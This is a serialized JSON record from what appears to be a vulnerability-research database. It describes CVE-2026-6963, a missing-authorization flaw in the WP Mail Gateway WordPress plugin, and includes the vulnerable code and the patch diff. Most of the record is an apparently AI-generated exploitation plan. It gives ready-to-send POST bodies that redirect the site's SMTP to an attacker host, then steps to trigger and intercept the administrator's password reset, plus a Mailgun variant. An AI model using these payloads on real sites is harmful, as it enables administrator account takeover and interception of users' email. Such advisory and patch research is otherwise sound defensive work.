[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fpz2eJWTMMVBV39qMNPZkggwyvW2mPhhiL6n5_GjSq9g":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-6963","wp-mail-gateway-missing-authorization-to-authenticated-subscriber-smtp-configuration-modification-via-wmgsaveprovidercon","WP Mail Gateway \u003C= 1.8 - Missing Authorization to Authenticated (Subscriber+) SMTP Configuration Modification via 'wmg_save_provider_config' AJAX Action","The WP Mail Gateway plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wmg_save_provider_config AJAX action in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update SMTP settings and redirect mail which can be used for privilege escalation by triggering a password reset email and using that to access and administrator's account.","wp-mail-gateway",null,"\u003C=1.8","1.8.1","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-05-01 00:00:00","2026-05-02 04:27:45",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc7caf1f4-a8dd-4016-91eb-2adbeed5290a?source=api-prod",1,[22,23,24,25,26,27,28],"assets\u002Fjs\u002Fmain.js","composer.json","composer.lock","readme.txt","src\u002FBootstrap.php","src\u002FFunctions.php","vendor\u002Fautoload.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-6963 (WP Mail Gateway)\n\n## 1. Vulnerability Summary\nThe **WP Mail Gateway** plugin for WordPress is vulnerable to unauthorized modification of SMTP and email gateway configurations. The vulnerability exists in the `wmg_save_provider_config` AJAX action, which is registered to the `wp_ajax_` hook but fails to implement any capability checks (e.g., `current_user_can('manage_options')`) or CSRF protection (nonces). Consequently, any authenticated user, including those with **Subscriber** privileges, can change the site's outgoing mail settings. This allows an attacker to redirect system emails—including password reset links—to an external server, leading to full administrative account takeover.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `wmg_save_provider_config`\n- **Authentication**: Required (Subscriber level or higher)\n- **Parameters**: \n    - `action`: `wmg_save_provider_config`\n    - `configs`: A JSON-encoded string containing the provider configuration details.\n- **Preconditions**:\n    - The attacker must have a valid login for a Subscriber account.\n    - The plugin must be active.\n\n## 3. Code Flow\n1. **Registration**: In `src\u002FBootstrap.php`, the `load()` function registers the AJAX action:\n   ```php\n   add_action( 'wp_ajax_wmg_save_provider_config', array( Functions::class, \"saveProviderConfigAjax\" ) );\n   ```\n   Note: The `is_admin()` check in `load()` evaluates to true during `admin-ajax.php` requests.\n2. **Entry Point**: The request reaches `ShahariaAzam\\WPMailGateway\\Functions::saveProviderConfigAjax` in `src\u002FFunctions.php`.\n3. **Missing Security Checks**: The function immediately begins processing `$_POST['configs']` without calling `current_user_can()` or `check_ajax_referer()`.\n4. **Data Processing**:\n   - It decodes the JSON: `$configs = json_decode(stripslashes($postData['configs']), true);`.\n   - It identifies the provider: `$gatewayProvider = $configs['provider'];`.\n   - It maps keys (e.g., `smtp_host`, `smtp_port`) to a `$finalConfigs` array.\n5. **Persistence (Sink)**: Although the final `update_option` call is truncated in the provided source, the context and `delete_option` call in `onDeletingPlugin` confirm that the configuration is stored in the WordPress `options` table using the key defined by `WP_MAIL_GATEWAY_PLUGIN_OPTIONS_KEY`.\n\n## 4. Nonce Acquisition Strategy\nAnalysis of `src\u002FFunctions.php` (specifically `loadPluginAdminPageStaticAssets` and `saveProviderConfigAjax`) and `assets\u002Fjs\u002Fmain.js` confirms that **no nonce is implemented** for this action. \n- The JS file `assets\u002Fjs\u002Fmain.js` sends the request using a raw `jQuery.ajax` call without including a nonce parameter in the `data` object.\n- The PHP handler `saveProviderConfigAjax` does not contain any `check_ajax_referer` or `wp_verify_nonce` calls.\n\n**Conclusion**: No nonce is required for exploitation.\n\n## 5. Exploitation Strategy\nThe goal is to update the SMTP settings to point to an attacker-controlled listener to intercept a password reset email for the administrator.\n\n### Step 1: Prepare SMTP Payload\nConstruct a JSON object for the `smtp` provider.\n```json\n{\n  \"provider\": \"smtp\",\n  \"smtp_from_name\": \"WP Admin\",\n  \"smtp_from_email\": \"admin@target.com\",\n  \"smtp_host\": \"attacker-smtp-host.example.com\",\n  \"smtp_port\": \"587\",\n  \"smtp_encryption\": \"tls\",\n  \"smtp_username\": \"attacker_user\",\n  \"smtp_password\": \"attacker_password\",\n  \"smtp_auth\": \"true\",\n  \"smtp_active\": \"true\"\n}\n```\n\n### Step 2: Send Modification Request\nUse the `http_request` tool to send the POST request to `admin-ajax.php` as a Subscriber.\n\n- **URL**: `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```\n  action=wmg_save_provider_config&configs={\"provider\":\"smtp\",\"smtp_from_name\":\"Exploit\",\"smtp_from_email\":\"admin@target.local\",\"smtp_host\":\"[ATTACKER_IP]\",\"smtp_port\":\"25\",\"smtp_encryption\":\"\",\"smtp_username\":\"\",\"smtp_password\":\"\",\"smtp_auth\":\"false\",\"smtp_active\":\"true\"}\n  ```\n\n### Step 3: Trigger Password Reset\nThe attacker then triggers the standard WordPress password reset for the user with ID 1 (Administrator).\n- **URL**: `http:\u002F\u002F[target]\u002Fwp-login.php?action=lostpassword`\n- **Body**: `user_login=admin&redirect_to=&wp-submit=Get+New+Password`\n\n### Step 4: Intercept and Escalate\nThe reset link will be sent via the attacker's SMTP server. The attacker uses the link to reset the admin password and gain full control.\n\n## 6. Test Data Setup\n1. **Install Plugin**: Ensure WP Mail Gateway version 1.8 is installed and active.\n2. **Target Admin**: Create or identify an administrator account (usually user ID 1, username `admin`).\n3. **Attacker Account**: Create a user with the **Subscriber** role:\n   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n4. **Environment**: Ensure the WordPress instance is configured to use the plugin's mailer (this usually happens automatically when a provider is marked \"active\" in the plugin).\n\n## 7. Expected Results\n- The AJAX request should return a JSON success response (e.g., `{\"success\":true}`).\n- Subsequent calls to `get_option()` for the plugin's settings key (likely `wp_mail_gateway_options`) will return the attacker's SMTP details.\n- System emails will be routed through the attacker-defined SMTP host.\n\n## 8. Verification Steps\nAfter the HTTP exploit, verify the configuration change using WP-CLI:\n```bash\n# Check the saved options (the key is likely WP_MAIL_GATEWAY_PLUGIN_OPTIONS_KEY)\nwp option get wp_mail_gateway_options\n```\nVerify that the `gateway_provider` -> `smtp` -> `host` matches the attacker's IP\u002Fhost.\n\n## 9. Alternative Approaches\nIf the `smtp` provider logic is complex, the attacker can use the **Mailgun** or **Sendgrid** provider blocks by providing their own API keys. This is equally effective for intercepting mail:\n- **Action**: `wmg_save_provider_config`\n- **Configs**: `{\"provider\":\"mailgun\",\"mailgun_from_name\":\"Exploit\",\"mailgun_from_email\":\"admin@target.local\",\"mailgun_api_key\":\"[ATTACKER_KEY]\",\"mailgun_domain\":\"[ATTACKER_DOMAIN]\",\"mailgun_active\":\"true\"}`","The WP Mail Gateway plugin for WordPress lacks authorization and CSRF checks in its 'wmg_save_provider_config' AJAX action, allowing authenticated users with Subscriber-level permissions or higher to modify the site's SMTP and email provider configurations. Attackers can exploit this to redirect system emails to an external server, enabling full administrative account takeover by intercepting password reset links.","\u002F\u002F src\u002FBootstrap.php line 49\nadd_action( 'wp_ajax_wmg_save_provider_config', array( Functions::class, \"saveProviderConfigAjax\" ) );\n\n---\n\n\u002F\u002F src\u002FFunctions.php line 118\npublic static function saveProviderConfigAjax() {\n    $postData = $_POST;\n    $configs = json_decode(stripslashes($postData['configs']), true);\n\n    $gatewayProvider = $configs['provider'];\n    $finalConfigs = [];\n    \u002F\u002F ... processes config and updates options without current_user_can() or check_ajax_referer()","--- a\u002Fassets\u002Fjs\u002Fmain.js\n+++ b\u002Fassets\u002Fjs\u002Fmain.js\n@@ -136,6 +136,7 @@\n         \u002F\u002FPost config data to backend via Ajax\n         var data = {\n             'action': 'wmg_save_provider_config',\n+            'nonce': wmgAjax.nonce,\n             'configs': JSON.stringify(configs)\n         };\n \n--- a\u002Fsrc\u002FFunctions.php\n+++ b\u002Fsrc\u002FFunctions.php\n@@ -118,6 +118,13 @@\n \tpublic static function saveProviderConfigAjax() {\n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\t\twp_send_json_error( [ 'message' => 'Unauthorized' ] );\n+\t\t}\n+\n+\t\tcheck_ajax_referer( 'wmg_ajax_nonce', 'nonce' );\n+\n \t\t$postData = $_POST;\n \t\t$configs = json_decode(stripslashes($postData['configs']), true);","1. Authenticate as a Subscriber-level user on the target WordPress site.\n2. Construct a JSON payload containing malicious SMTP configuration (e.g., pointing to an attacker-controlled SMTP server) and set it as 'active'.\n3. Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action 'wmg_save_provider_config' and the 'configs' parameter containing the JSON payload. No nonce or capability check will block this request.\n4. Trigger a WordPress password reset for the 'admin' user via `\u002Fwp-login.php?action=lostpassword`.\n5. Intercept the password reset email on the attacker-controlled SMTP server, click the reset link, and change the administrator's password to gain full access.","gemini-3-flash-preview","2026-05-04 17:26:04","2026-05-04 17:26:41",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","1.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-mail-gateway\u002Ftags\u002F1.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-mail-gateway.1.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-mail-gateway\u002Ftags\u002F1.8.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-mail-gateway.1.8.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-mail-gateway\u002Ftags"]